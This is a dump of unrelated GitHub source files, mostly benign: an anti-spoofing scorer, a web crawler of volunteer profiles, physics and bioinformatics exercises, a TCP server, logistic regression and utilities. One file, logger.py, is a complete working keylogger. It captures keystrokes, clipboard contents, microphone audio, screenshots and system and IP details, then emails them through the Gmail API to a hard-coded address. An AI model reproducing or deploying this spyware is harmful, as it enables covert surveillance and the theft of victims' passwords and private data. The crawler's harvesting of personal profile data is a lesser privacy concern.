== 'lcnn_9_CC':\n\t\tmodel_mix = model_.lcnn_9layers_CC(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'lcnn_29_CC':\n\t\tmodel_mix = model_.lcnn_29layers_CC(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'resnet_CC':\n\t\tmodel_mix = model_.ResNet_CC(ncoef=args.ncoef_mix, resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'TDNN':\n\t\tmodel_mix = model_.FTDNN(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'TDNN_multipool':\n\t\tmodel_mix = model_.TDNN_multipool(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'TDNN_LSTM':\n\t\tmodel_mix = model_.TDNN_LSTM(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'FTDNN':\n\t\tmodel_mix = model_.TDNN(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'Linear':\n\t\tmodel_mix = model_.Linear(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'mobilenet':\n\t\tmodel_mix = model_.MobileNetV3_Small()\n\telif args.model_mix == 'densenet':\n\t\tmodel_mix = model_.DenseNet()\n\n\tprint('Loading model')\n\n\tckpt = torch.load(args.cp_path, map_location = lambda storage, loc: storage)\n\tmodel_la.load_state_dict(ckpt['model_la_state'])\n\tmodel_pa.load_state_dict(ckpt['model_pa_state'])\n\tmodel_mix.load_state_dict(ckpt['model_mix_state'])\n\tmodel_la.eval()\n\tmodel_pa.eval()\n\tmodel_mix.eval()\n\n\tprint('Model loaded')\n\n\tprint('Loading data')\n\n\tdata_la = { k:m for k,m in read_mat_scp(args.path_to_data_la) }\n\tdata_pa = { k:m for k,m in read_mat_scp(args.path_to_data_pa) }\n\tdata_mix = { k:m for k,m in read_mat_scp(args.path_to_data_mix) }\n\n\n\tif args.trials_path:\n\t\tif args.eval:\n\t\t\ttest_utts = read_trials(args.trials_path, eval_=args.eval)\n\t\telse:\n\t\t\ttest_utts, attack_type_list, label_list = read_trials(args.trials_path, eval_=args.eval)\n\telse:\n\t\ttest_utts = list(data_la.keys())\n\n\tprint('Data loaded')\n\n\tprint('Start of scores computation')\n\n\tscores = {}\n\n\tscores['all'] = []\n\tscores['la'] = []\n\tscores['pa'] = []\n\tscores['mix'] = []\n\tscores['fusion'] = []\n\n\twith torch.no_grad():\n\n\t\tfor i, utt in enumerate(test_utts):\n\n\t\t\tfeats_la = prep_feats(data_la[utt])\n\t\t\tfeats_pa = prep_feats(data_pa[utt])\n\t\t\tfeats_mix = prep_feats(data_mix[utt])\n\n\t\t\ttry:\n\t\t\t\tif args.cuda:\n\t\t\t\t\tfeats_la = feats_la.to(device)\n\t\t\t\t\tfeats_pa = feats_pa.to(device)\n\t\t\t\t\tfeats_mix = feats_mix.to(device)\n\t\t\t\t\tmodel_la = model_la.to(device)\n\t\t\t\t\tmodel_pa = model_pa.to(device)\n\t\t\t\t\tmodel_mix = model_mix.to(device)\n\n\t\t\t\tpred_la = model_la.forward(feats_la).squeeze()\n\t\t\t\tpred_pa = model_pa.forward(feats_pa).squeeze()\n\t\t\t\tpred_mix = model_mix.forward(feats_mix).squeeze()\n\n\t\t\texcept:\n\t\t\t\tfeats_la = feats_la.cpu()\n\t\t\t\tfeats_pa = feats_pa.cpu()\n\t\t\t\tfeats_mix = feats_mix.cpu()\n\t\t\t\tmodel_la = model_la.cpu()\n\t\t\t\tmodel_pa = model_pa.cpu()\n\t\t\t\tmodel_mix = model_mix.cpu()\n\n\t\t\t\tpred_la = model_la.forward(feats_la).squeeze()\n\t\t\t\tpred_pa = model_pa.forward(feats_pa).squeeze()\n\t\t\t\tpred_mix = model_mix.forward(feats_mix).squeeze()\n\n\t\t\tif args.train_mode == 'mix':\n\t\t\t\tmixture_coef = 1.0-torch.sigmoid(pred_mix).squeeze()\n\t\t\t\tscore_all = 1.0-torch.sigmoid(mixture_coef*pred_la + (1.-mixture_coef)*pred_pa).squeeze().cpu().item()\n\t\t\t\tscore_la = 1.0-torch.sigmoid(pred_la).squeeze().cpu().item()\n\t\t\t\tscore_pa = 1.0-torch.sigmoid(pred_pa).squeeze().cpu().item()\n\t\t\t\tscore_mix = 1.0-2*abs(mixture_coef.cpu().item()-0.5)\n\t\t\t\tscore_fusion = (score_all+score_la+score_pa+score_mix)/4.\n\n\t\t\telif args.train_mode == 'lapa':\n\t\t\t\tscore_all = 0.0\n\t\t\t\tscore_la = 1.0-2*abs(torch.sigmoid(pred_la)-0.5).cpu().numpy().item()\n\t\t\t\tscore_pa = 1.0-2*abs(torch.sigmoid(pred_pa)-0.5).cpu().numpy().item()\n\t\t\t\tscore_mix = 1.0-2*abs(torch.sigmoid(pred_mix)-0.5).cpu().numpy().item()\n\t\t\t\tscore_fusion = (score_la+score_pa+score_mix)/3.\n\n\t\t\telif args.train_mode == 'independent':\n\t\t\t\tscore_all = 0.0\n\t\t\t\tscore_la = 1.0-torch.sigmoid(pred_la).cpu().numpy().item()\n\t\t\t\tscore_pa = 1.0-torch.sigmoid(pred_pa).cpu().numpy().item()\n\t\t\t\tscore_mix = 1.0-torch.sigmoid(pred_mix).cpu().numpy().item()\n\t\t\t\tscore_fusion = (score_la+score_pa+score_mix)/3.\n\n\t\t\tscores['all'].append(score_all)\n\t\t\tscores['la'].append(score_la)\n\t\t\tscores['pa'].append(score_pa)\n\t\t\tscores['mix'].append(score_mix)\n\t\t\tscores['fusion'].append(score_fusion)\n\n\tif not args.no_output_file:\n\n\t\tprint('Storing scores in output file:')\n\t\tprint(args.out_path)\n\n\t\tfor score_type, score_list in scores.items():\n\n\t\t\tif (args.train_mode=='lapa' or args.train_mode=='independent') and score_type=='all':\n\t\t\t\tcontinue\n\n\t\t\tfile_name = args.out_path+args.prefix+'_'+score_type+'.txt'\n\n\t\t\twith open(file_name, 'w') as f:\n\t\t\t\tif args.eval or args.trials_path is None:\n\t\t\t\t\tfor i, utt in enumerate(test_utts):\n\t\t\t\t\t\tf.write(\"%s\" % ' '.join([utt, str(score_list[i])+'\\n']))\n\t\t\t\telse:\n\t\t\t\t\tfor i, utt in enumerate(test_utts):\n\t\t\t\t\t\tf.write(\"%s\" % ' '.join([utt, attack_type_list[i], label_list[i], str(score_list[i])+'\\n']))\n\n\tif not args.no_eer and not args.eval and args.trials_path:\n\t\tfor score_type, score_list in scores.items():\n\t\t\tprint('\\nEER {}: {}\\n'.format(score_type, compute_eer_labels(label_list, score_list)))\n\n\tprint('All done!!')\n","repo_name":"joaomonteirof/e2e_antispoofing","sub_path":"score_all.py","file_name":"score_all.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"56"} +{"seq_id":"71318026735","text":"#!usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Apache License Version 2.0\n# utility functions to crawl html pages from bv2008.cn\n\nimport requests\nmain_url = 'http://www.bv2008.cn/app/'\n\nimport logging\nlogging.basicConfig(level = logging.INFO,format = '%(asctime)s - %(name)s[line:%(lineno)d] - %(levelname)s - %(message)s')\nlogger = logging.getLogger('crawl.py')\n\n\nfrom func import get_user_joined_project,get_project_joined_user,get_user_detailed_info,get_organization_detailed_info\nfrom database import get_project_id,get_update_volunteer_list\n\ndef get_organization_initiate_project(organization_id):\n \"\"\"\n given organization_id, get all the project the organization initiates\n Parameters\n ----------\n organization_id : int or list, if list, the first element of list is counted as main registration id\n\n Returns\n ------- \n None\n \"\"\"\n max_page_num = 10\n main_organization_id = None\n if(type(organization_id) == type([])):\n main_organization_id = organization_id[0]\n else:\n main_organization_id = organization_id\n organization_id = [organization_id] # make a list\n # extract organization info\n request_url = main_url + 'org/view.php?id=%d'%main_organization_id\n response=requests.get(request_url)\n if not(response.status_code == 200):\n raise ValueError(\"status code not equal 200\")\n get_organization_detailed_info(response.text,main_organization_id)\n for o_id in organization_id: \n for i in range(1,max_page_num):\n request_url = main_url + 'api/view.php?m=get_opps&type=2&id=%d&p=%d'%(o_id,i)\n response=requests.get(request_url)\n if not(response.status_code == 200):\n raise ValueError(\"status code not equal 200\")\n # the top element is for the first page\n if(response.text.count('tr')<3):# empty table\n break\n get_user_joined_project(response.text,main_organization_id)\n\ndef update_project_joined_user(organization_id = None):\n \"\"\"\n select project ids from table 'project' and get the joined user html table from bv2008.cn,\n then call the function 'get_project_joined_user'\n Parameters\n ----------\n organization_id : int\n\n \"\"\"\n for i in get_project_id(organization_id):\n request_url = main_url + 'opp/view.php?id=%d'%(int(i[0]))\n response=requests.get(request_url)\n if not(response.status_code == 200):\n logging.error('request url %s failed' % request_url)\n raise ValueError(\"status code not equal 200\")\n if(response.text.find('error_icon errno')>0): #项目不存在或不公开招募\n continue\n get_project_joined_user(response.text,given_project_id = int(i[0]))\n\ndef update_volunteer_info():\n \"\"\"\n select volunteer ids from table 'volunteer' and get user html table from bv2008.cn,\n then call the function 'get_user_detailed_info'\n \"\"\"\n for i in get_update_volunteer_list():\n request_url = main_url + 'user/view.php?id=%d'%(int(i[0]))\n response=requests.get(request_url)\n if not(response.status_code == 200):\n raise ValueError(\"status code not equal 200\")\n # handle js url redirection\n if(response.text[-9:] == ''):\n new_user_url_start = response.text.find('http')\n new_user_url_end = response.text.find('\";')\n if not(new_user_url_end>0):\n raise ValueError(response.text)\n new_user_url = response.text[new_user_url_start:new_user_url_end]\n logging.info('request redirected url: %s' % new_user_url)\n response = requests.get(new_user_url)\n if not(response.status_code == 200):\n raise ValueError(\"status code not equal 200\")\n get_user_detailed_info(response.text,given_user_id = int(i[0]))\n \nif __name__ == '__main__':\n # for testing purpose only\n organization_list = [3474414,3474395] #,3474384,3474378,3474376,3474316,3471958,3470375]\n for i in organization_list:\n get_organization_initiate_project(organization_id = i)\n update_project_joined_user(organization_id = i)\n update_volunteer_info()\n\n","repo_name":"zhaofeng-shu33/bv2008","sub_path":"crawl/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23824936054","text":"\"\"\"\nRuns a simple simulation, saves it to disk and loads it back for plotting.\n\"\"\"\n\nimport os\nimport gnlse\n\nif __name__ == '__main__':\n setup = gnlse.GNLSESetup()\n setup.resolution = 2**13\n setup.time_window = 12.5 # ps\n setup.z_saves = 200\n setup.fiber_length = 0.15 # m\n setup.wavelength = 835 # nm\n setup.pulse_model = gnlse.GaussianEnvelope(1, 0.1)\n\n solver = gnlse.GNLSE(setup)\n solution = solver.run()\n\n path = 'test.mat'\n\n solution.to_file(path)\n solution = gnlse.Solution()\n solution.from_file(path)\n\n gnlse.quick_plot(solution)\n\n os.remove(path)\n","repo_name":"WUST-FOG/gnlse-python","sub_path":"examples/test_import_export.py","file_name":"test_import_export.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"56"} +{"seq_id":"6821679952","text":"'''\r\nGoal: Compute the probability of a hidden path \r\nInput: hidden path π followed by the states States and \r\n transition matrix Transition of a Hidden Markov Model (HMM) (Sigma, States, Transition, Emission)\r\nOutput: The probability of this path, Pr(pi)\r\n\r\n./testcases/10.5HiddenPathProbability_Sample.txt\r\n\r\n'''\r\nimport numpy as np \r\n\r\ndef ReadFile():\r\n with open('./datasets/dataset_609241_8.txt', 'r') as f:\r\n Path = str(f.readline().strip())\r\n f.readline()\r\n States = f.readline().strip().split()\r\n f.readline()\r\n f.readline()\r\n Matrix = [line.strip().split() for line in f.readlines()]\r\n\r\n Transition = {}\r\n for row in Matrix:\r\n for i, prob in enumerate(row[1:]):\r\n Transition[row[0] + States[i]] = float(prob)\r\n return Path, States, Transition\r\n\r\ndef HiddenPath (Path, States, Transition):\r\n #inital probability of states is split evenly between the states \r\n Pr = 1/ len(States)\r\n #for the rest of the path probabily is based on the transitions matrix\r\n for i in range(len(Path)-1):\r\n #multiply the current probabily by the previous probabilities sum\r\n Pr *= Transition[Path[i:i+2]]\r\n return Pr\r\n\r\n \r\n\r\nPath, States, Transition = ReadFile()\r\nPr = HiddenPath(Path, States, Transition)\r\nprint('Pr', Pr)","repo_name":"mmeghan/INFO403_CodingChallenges","sub_path":"Chapter10/10.5_ProbabilityOfHiddenPath.py","file_name":"10.5_ProbabilityOfHiddenPath.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36299423691","text":"from collections import Counter\nclass Solution(object):\n def commonChars(self, A):\n \"\"\"\n :type A: List[str]\n :rtype: List[str]\n \"\"\"\n result = Counter(A[0])\n for a in A[1:]:\n counter = Counter(a)\n for key, value in counter.items():\n counter[key] = min(result[key], value)\n result = counter\n rval = []\n for key, value in result.items():\n if value:\n rval.extend([key] * value)\n return rval\n \n","repo_name":"kaiwensun/leetcode","sub_path":"1001-1500/1002.Find Common Characters.py","file_name":"1002.Find Common Characters.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"56"} +{"seq_id":"21896854207","text":"#! /usr/bin/python3\n\nimport threading\nimport socket\nimport sys\nimport logging\nimport json\nfrom pprint import pformat\nfrom typing import Callable, Tuple, Union\n\nfrom conn import (\n ADDR, DISCONNECT_MESSAGE, SERVER_ADDR, CODEC_FORMAT,\n send, receive,\n)\n\nLOG_FORMAT = '%(asctime)s %(threadName)-17s %(message)s'\nlogging.basicConfig(level=logging.INFO, \n format=LOG_FORMAT, \n handlers=[ \n logging.FileHandler(r'server.log'),\n logging.StreamHandler(sys.stdout),\n ])\nlogger = logging.getLogger(__name__)\n\n# ||--- Global\n\nvisited_addr = {}\n\n# ---||\nlock = threading.Lock()\n\n\ndef select_op(op: str) -> Union[Callable[[int, int], Union[int, float]], bool]:\n if op == '+': \n return lambda a, b: a + b\n elif op == '-': \n return lambda a, b: a - b\n elif op == '*': \n return lambda a, b: a * b\n elif op == '/': \n return lambda a, b: a / b\n elif op == '%':\n return lambda a, b: a % b\n else: \n return False\n\n\ndef exec(req: str) -> Union[int, float, bool]: \n try:\n op, a, b = req.split()\n func = select_op(op)\n return func(int(a), int(b))\n except ZeroDivisionError as e:\n print(e)\n return False\n\n\ndef handle_client(conn: socket.socket, addr: Tuple[str, int]) -> None:\n logger.info(f'[NEW CONNECTION] {addr} connected.')\n\n while True:\n msg = receive(conn)\n logger.info(f'[REQUEST] from {addr}: {msg}')\n msg = json.loads(msg)\n req = msg.get('req')\n \n if req == DISCONNECT_MESSAGE:\n break\n \n with lock:\n if addr not in visited_addr:\n visited_addr[addr] = 1\n else:\n visited_addr[addr] += 1\n\n # logger.info(pformat(visited_addr))\n res = exec(req)\n if res is not False:\n payload = json.dumps({'res_': res})\n send(conn, bytes(payload, encoding=CODEC_FORMAT))\n else:\n payload = json.dumps({'res_': 'Failed!'})\n send(conn, bytes(payload, encoding=CODEC_FORMAT))\n conn.close()\n\n\ndef start_server() -> None:\n server.listen(1)\n logger.info(f'[LISTENING] on {SERVER_ADDR}')\n try:\n while True:\n conn, addr = server.accept()\n t = threading.Thread(target=handle_client, args=(conn, addr))\n t.start()\n logger.info(f'[ACTIVE CONNECTION] {threading.active_count() - 1}') # exclude main thread\n finally:\n conn.close()\n\nif __name__ == '__main__':\n try:\n server = socket.socket(\n family=socket.AF_INET,\n type=socket.SOCK_STREAM,\n )\n server.bind(ADDR)\n except socket.error as e:\n logger.error(f'Fail to create a socket: {e}')\n sys.exit()\n \n try:\n logger.info('[SERVER STARTED]')\n start_server()\n finally:\n input('Press [ENTER]...')","repo_name":"Tatchakorn/Multi-threaded-Server-","sub_path":"multicast/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"17341285410","text":"from datetime import date, timedelta, datetime\n\ndef normalize_date_to_isoformat(date):\n DATETIME_FORMAT = '%Y-%m-%d %H:%M'\n \n #get rid of the unwanted ' GMT+0000' at the end eGain dates\n clean_date = date[0: len(date) - 16] \n \n date_obj = datetime.strptime(clean_date , DATETIME_FORMAT)\n \n return date_obj.isoformat()","repo_name":"zainiaz/logs4j-custom-parser","sub_path":"src/functions/normalize_date_to_isoformat.py","file_name":"normalize_date_to_isoformat.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36425724443","text":"# ==================================================== DESAFIO 101 =====================================================\n# Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro o ano de nascimento de uma pessoa,\n# retornando um valor literal indicando se uma pessoa tem voto NEGADO, OPCIONAL e OBRIGATÓRIO nas eleições.\n# ======================================================================================================================\nfrom datetime import date\n\nano_atual = date.today().year\n\ndef voto(ano):\n if ano_atual - ano < 16:\n return 'NEGADO'\n elif 16 <= ano_atual - ano < 18 or ano_atual - ano > 65:\n return 'OPCIONAL'\n else:\n return 'OBRIGATORIO'\n\nano_nasc = int(input('Digite o ano de nascimento: '))\nprint(f'Com {ano_atual - ano_nasc} anos, o voto é {voto(ano_nasc)}!')\n","repo_name":"wandersoncarelli/Exercicios-Python3","sub_path":"101 – Funções para votação.py","file_name":"101 – Funções para votação.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"8589819704","text":"import socket\r\nimport platform\r\nimport win32clipboard\r\nimport datetime\r\nfrom pynput.keyboard import Key, Listener\r\nfrom scipy.io.wavfile import write\r\nimport sounddevice as sd\r\nfrom requests import get, RequestException\r\nfrom PIL import ImageGrab\r\nimport multiprocessing\r\nfrom time import perf_counter\r\nfrom mail_support import authenticateGmailAPIs, send_mail\r\n\r\n\r\ndef get_system_information(path):\r\n with open(path, \"w\") as f:\r\n host_name = socket.gethostname()\r\n IP = socket.gethostbyname(host_name)\r\n\r\n f.write(\"System: \" + platform.system() + \" \" + platform.version())\r\n f.write(\"\\nMachine: \" + platform.machine())\r\n f.write(\"\\nProcessor: \" + platform.processor())\r\n f.write(\"\\nHostname: \" + host_name)\r\n f.write(\"\\nPrivate IP Address: \" + IP)\r\n\r\n try:\r\n pub_ip = get(\"https://api.ipify.org\").text\r\n f.write(\"\\nPublic IP Address: \" + pub_ip)\r\n except RequestException:\r\n f.write(\"\\nPublic IP Address: Could not retrieve public ip address\")\r\n\r\n\r\ndef get_clipboard(path):\r\n with open(path, \"w\") as f:\r\n try:\r\n win32clipboard.OpenClipboard()\r\n data = win32clipboard.GetClipboardData()\r\n f.write(\"Clipboard Data:\\n\\n\" + data)\r\n except TypeError:\r\n f.write(\"\\nNon-text information found in clipboard!!\")\r\n finally:\r\n win32clipboard.CloseClipboard()\r\n\r\n\r\ndef get_microphone(path,mic_act):\r\n sf = 44100\r\n seconds = mic_act\r\n recording = sd.rec(int(seconds * sf), samplerate=sf, channels=2)\r\n sd.wait()\r\n write(path, sf, recording)\r\n\r\n\r\ndef grab_screenshot(path):\r\n img = ImageGrab.grab()\r\n img.save(path)\r\n\r\n\r\ndef on_press(key):\r\n global keys, count\r\n\r\n k = str(key).replace(\"'\",\"\")\r\n keys.append(k)\r\n count += 1\r\n # print(keys)\r\n\r\n if count >= 1:\r\n count = 0\r\n write_to_list(keys)\r\n keys = []\r\n\r\n\r\ndef write_to_list(_keys):\r\n global log_list,fn_key_list,lookup_num\r\n\r\n for key in _keys:\r\n if key.find(\"shift\") > 0 or key.find(\"esc\") > 0 or key.find(\"ctrl\") > 0 or key.find(\"alt\") > 0 \\\r\n or key.find(\"cmd\") > 0:\r\n pass\r\n elif key.find(\"up\") > 0 or key.find(\"down\") > 0 or key.find(\"left\") > 0 or key.find(\"right\") > 0:\r\n pass\r\n elif key.find(\"backspace\") > 0:\r\n log_list = log_list[:-1]\r\n elif key.find(\"enter\") > 0:\r\n log_list.append(\"\\n\")\r\n elif key.find(\"space\") > 0:\r\n log_list.append(\" \")\r\n elif key.find(\"tab\") > 0:\r\n log_list.append(\"\\t\")\r\n elif key.find(\"caps_lock\") > 0 or key.find(\"num_lock\") > 0 or key.find(\"scroll_lock\") > 0:\r\n pass\r\n elif key.find(\"menu\") > 0 or key.find(\"insert\") > 0 or key.find(\"end\") > 0 or key.find(\"page_\") > 0 or \\\r\n key.find(\"delete\") > 0 or key.find(\"home\") > 0 or key.find(\"print_screen\") > 0 or \\\r\n key.find(\"pause\") > 0 or key.find(\"media_\") > 0:\r\n pass\r\n elif key in fn_key_list:\r\n pass\r\n elif key.find('\"\"') >= 0:\r\n log_list.append(\"\\'\")\r\n elif key.find(\"\\\\\\\\\") >= 0:\r\n log_list.append(\"\\\\\")\r\n elif key == \"<12>\":\r\n pass\r\n elif key == \"<110>\":\r\n log_list.append(\".\")\r\n elif key in lookup_num:\r\n log_list.append(lookup_num.get(key))\r\n else:\r\n log_list.append(key)\r\n\r\n\r\ndef on_release(key):\r\n # global prev\r\n if key == Key.esc:\r\n dt_end = datetime.datetime.now()\r\n with open(file_path + extend + key_info, \"a\") as f:\r\n f.writelines(log_list)\r\n f.write(f\"\\n\\nLogging Terminated> {dt_end.day}/{dt_end.month}/{dt_end.year} | {dt_end.hour}:\"\r\n f\"{dt_end.minute}:{dt_end.second}\\n\")\r\n f.close()\r\n # print(log_list)\r\n\r\n send_mail(to_address, from_address, \"Target Details\", \"Take a look at the information acquired!!\",\r\n attachments,authenticateGmailAPIs())\r\n\r\n return False\r\n\r\n \"\"\"\r\n curr = time.time()\r\n diff = curr - prev\r\n prev = curr\r\n if diff > 5:\r\n # print(\"exceeded 5 sec(s)\")\r\n with open(file_path + extend + key_info, \"a\") as f:\r\n f.writelines(log_list)\r\n f.close()\r\n log_list.clear()\r\n \"\"\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start = perf_counter()\r\n file_path = \"C:\\\\Users\\\\Varun\\\\PycharmProjects\\\\keylogger\"\r\n extend = \"\\\\\"\r\n\r\n key_info = \"log.txt\"\r\n system_info = \"sys_info.txt\"\r\n clipboard_info = \"clipboard.txt\"\r\n\r\n audio_info = \"audio.wav\"\r\n microphone_activate = 5\r\n\r\n ss_info = \"grab.png\"\r\n\r\n from_address = '2112.vas.1803@gmail.com'\r\n to_address = '2112.vas.1803@gmail.com'\r\n\r\n attachments = [file_path + extend + key_info,\r\n file_path + extend + system_info,\r\n file_path + extend + clipboard_info,\r\n file_path + extend + audio_info,\r\n file_path + extend + ss_info]\r\n\r\n count = 0\r\n keys = []\r\n\r\n log_list = []\r\n fn_key_list = ['Key.f1', 'Key.f2', 'Key.f3', 'Key.f4', 'Key.f5', 'Key.f6',\r\n 'Key.f7', 'Key.f8', 'Key.f9', 'Key.f10', 'Key.f11', 'Key.f12', '<255>']\r\n lookup_num = {\r\n '<96>': '0',\r\n '<97>': '1',\r\n '<98>': '2',\r\n '<99>': '3',\r\n '<100>': '4',\r\n '<101>': '5',\r\n '<102>': '6',\r\n '<103>': '7',\r\n '<104>': '8',\r\n '<105>': '9'\r\n }\r\n\r\n dt_beg = datetime.datetime.now()\r\n with open(file_path + extend + key_info, \"w\") as fp:\r\n fp.write(f\"Logging Started> {dt_beg.day}/{dt_beg.month}/{dt_beg.year} | {dt_beg.hour}\"\r\n f\":{dt_beg.minute}:{dt_beg.second}\\n\\n\")\r\n fp.close()\r\n\r\n # prev = time.time()\r\n ls = Listener(on_press=on_press, on_release=on_release)\r\n ls.start()\r\n\r\n p1 = multiprocessing.Process(target=get_system_information,args=(file_path + extend + system_info,),daemon=True)\r\n p2 = multiprocessing.Process(target=get_clipboard,args=(file_path + extend + clipboard_info,),daemon=True)\r\n p3 = multiprocessing.Process(target=get_microphone,args=(file_path + extend + audio_info,microphone_activate),\r\n daemon=True)\r\n p4 = multiprocessing.Process(target=grab_screenshot,args=(file_path + extend + ss_info,),daemon=True)\r\n\r\n p1.start()\r\n p2.start()\r\n p3.start()\r\n p4.start()\r\n\r\n ls.join()\r\n\r\n end = perf_counter()\r\n\r\n print(f\"Done in {end-start} second(s)\")\r\n","repo_name":"Varun-Ajith-Sivaram/advanced_keylogger_python","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74298124014","text":"import numpy as np\nfrom helpers import *\nfrom proj1_helpers import *\n\n\nnp.seterr(over='ignore')\n\nBINARY_CLASSIFICATOIN_0 = -1\nBINARY_CLASSIFICATOIN_1 = 1\n\n\ndef sigmoid(t):\n \"\"\"apply sigmoid function on t.\"\"\"\n return 1.0 / (1.0 + np.exp(-t))\n\n\ndef calculate_loss_logistic_regression(y, tx, w):\n \"\"\"compute the cost by negative log likelihood.\"\"\"\n prediction = tx @ w\n y1 = np.where(y == BINARY_CLASSIFICATOIN_1)\n\n over_700 = np.where(prediction >= 700)\n\n prediction_result = np.log(1 + np.exp(prediction))\n prediction_result[over_700] = prediction[over_700]\n prediction_result[y1] -= prediction[y1]\n\n result = np.sum(prediction_result)\n return result\n\n\ndef calculate_gradient_logistic_regression(y, tx, w):\n \"\"\"compute the gradient of loss.\"\"\"\n\n y1 = np.where(y == BINARY_CLASSIFICATOIN_1)\n sig = sigmoid(tx @ w).reshape(len(y))\n sig[y1] -= y[y1]\n\n return tx.T @ sig\n\n\ndef logistic_regression_helper(y, tx, gamma, max_iters, lambda_, tX_ori, y_ori, init_w):\n if init_w is None:\n w = np.zeros((tx.shape[1], 1))\n else:\n w = init_w\n\n w = w.reshape(np.zeros((tx.shape[1], 1)).shape)\n\n w_max = w\n performance = 0\n i = 0\n\n threshold = 1e-8\n loss_prev = 0\n batch_size = 1000\n\n for iter in range(max_iters):\n\n flag = 1\n\n # for minibatch_y, minibatch_tx in batch_iter(y, tx, batch_size):\n\n loss = calculate_loss_logistic_regression(y, tx, w) + lambda_ * np.linalg.norm(w, 2)\n gradient = calculate_gradient_logistic_regression(y, tx, w)\n w -= (gradient * gamma).reshape(w.shape)\n\n if (loss_prev != 0) and np.abs(loss_prev - loss) < threshold:\n print(\"Reached Theshold, exit\")\n flag = 0\n break\n\n loss_prev = loss\n\n if (iter % 10) == 0:\n compare_pred = predict_labels(w, tX_ori)\n compare_pred -= y_ori.reshape([len(y_ori), 1])\n nonzero = 0\n for j in range(len(compare_pred)):\n if (compare_pred[j] != 0):\n nonzero += 1\n\n cur_perf = 1 - nonzero / compare_pred.size\n if cur_perf > performance:\n performance = cur_perf\n w_max = w\n i = iter\n\n if (iter % 300) == 0:\n print(w_max)\n print(\"Performance: \", performance)\n print(\"Iteration: \", i)\n\n\n if (iter % 100) == 0:\n print(\"Current iteration={i}, the loss={l}\".format(i=iter, l=loss))\n\n if flag == 0:\n break\n\n return w\n\n\ndef logistic_regression(y, tx, gamma, max_iters):\n \"\"\" return the final w from the logistic regression \"\"\"\n return logistic_regression_helper(y, tx, gamma, max_iters, lambda_=0)\n\n\ndef reg_logistic_regression(y, tx, lambda_, gamma, max_iters, tX_ori, y_ori, init_w=None):\n \"\"\" return the final w from the penalized logistic regression, with lambda_ as a non 0 value\"\"\"\n return logistic_regression_helper(y, tx, gamma, max_iters, lambda_, tX_ori, y_ori, init_w)\n","repo_name":"franksun007/ML_Project1","sub_path":"src/python/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"13711762693","text":"import os\nimport speech_recognition as sr\n\ndef speak(text, voice):\n os.system(\"espeak -v {} '{}'\".format(voice, text))\n\ndef listen():\n # Inizializza un riconoscitore vocale\n r = sr.Recognizer()\n\n # Usa il microfono come sorgente audio\n with sr.Microphone() as source:\n print(\"Dimmi qualcosa!\")\n audio = r.listen(source)\n\n try:\n # Riconosci il testo dall'audio\n text = r.recognize_google(audio)\n return text\n except sr.UnknownValueError:\n print(\"Non ho capito cosa hai detto.\")\n except sr.RequestError as e:\n print(\"Impossibile completare la richiesta: {}\".format(e))\n\nif __name__ == '__main__':\n # Imposta la voce desiderata\n voice = 'en-scottish'\n\n # Inizia la conversazione\n while True:\n # Ascolta l'input vocale\n input_text = listen()\n print(\"Hai detto: {}\".format(input_text))\n\n # Esegui la sintesi vocale in risposta\n response_text = \"Hai detto: {}\".format(input_text)\n speak(response_text, voice)\n","repo_name":"Miciox5/ChatBot-Piton","sub_path":"Trial/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"25119751284","text":"\"\"\"UI spinner functions.\"\"\"\nfrom types import TracebackType\nfrom typing import Optional, Type\n\nfrom rich.progress import Progress, SpinnerColumn, TextColumn, TimeElapsedColumn\n\nSPINNER = \"dots\"\n\n\nclass Spinner:\n \"\"\"Spinner from rich.\n\n Implements a context manager interface using the __enter__() and __exit__() methods.\n \"\"\"\n\n status: str\n progress: Progress\n\n def __init__(self, status: str):\n \"\"\"Initialize a spinner using Progress.\n\n Args:\n status (str): task description\n \"\"\"\n self.status = status\n self.progress = Progress(\n SpinnerColumn(spinner_name=SPINNER),\n TimeElapsedColumn(),\n TextColumn(\"[progress.description]{task.description}\"),\n )\n self.progress.add_task(description=status, total=None)\n\n def __enter__(self) -> \"Spinner\":\n \"\"\"Call when a spinner object is created using a `with` statement.\n\n Returns:\n Spinner: the instance for a context manager.\n \"\"\"\n self.progress.start()\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n \"\"\"Called when the with block is exited to stop the 